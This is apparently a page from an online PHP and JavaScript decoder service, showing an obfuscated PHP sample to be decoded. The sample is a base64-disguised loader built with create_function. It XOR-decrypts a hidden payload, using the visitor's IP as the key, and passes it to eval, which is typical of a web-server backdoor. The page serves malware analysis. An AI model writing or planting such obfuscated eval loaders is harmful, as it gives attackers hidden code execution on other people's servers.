Online PHP and Javascript Decoder decode hidden script to uncover its real functionalityY3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9O='cmV0dXJuIGV2YWwoJF9fXyk7';
Y3JlYXRlX0ZVTkNUSU9O_='base64_decode';
Y3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9O__='DQokayA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOw0KLy8kayA9IG1kNSgkX1NFUlZFUlsiUkVNT1RFX0FERFIiXSk7IA0KJGFhID0gYmFzZTY0X2RlY29kZSgnUWtsZFJWWmVEaDhLYm1KMFlHVnJZbWRvREVOTFhFQVRiQmtWJyk7DQpmb3IoJGkgPSAwOyAkaSA8IHN0cmxlbigkYWEpOyAkaSsrKSB7DQoJJGFhWyRpXSA9ICRhYVskaV0gXiAka1skaSAlIHN0cmxlbigkayldOw0KfQ0KLy9DYWxsaW5nIHN5c3RlbQ0KdHJ5e2VjaG8gZXZhbCgkYWEpO31jYXRjaChQYXJzZUVycm9yICRlKXt9DQoNCg==';
Y3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9O=Y3JlYXRlX0ZVTkNUSU9O_(Y3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9O);
Y3JlYXRlX0ZVTkNUSU9O=Y3JlYXRlX0ZVTkNUSU9O_(Y3JlYXRlX0ZVTkNUSU9O);
Y3JlYXRlX0ZVTkNUSU9O__=Y3JlYXRlX0ZVTkNUSU9O('Y3JlYXRlX0ZVTkNUSU9O',Y3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9O);
Y3JlYXRlX0ZVTkNUSU9O__(Y3JlYXRlX0ZVTkNUSU9O_(Y3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9OY3JlYXRlX0ZVTkNUSU9O__));© 2020 Quttera Ltd. All rights reserved.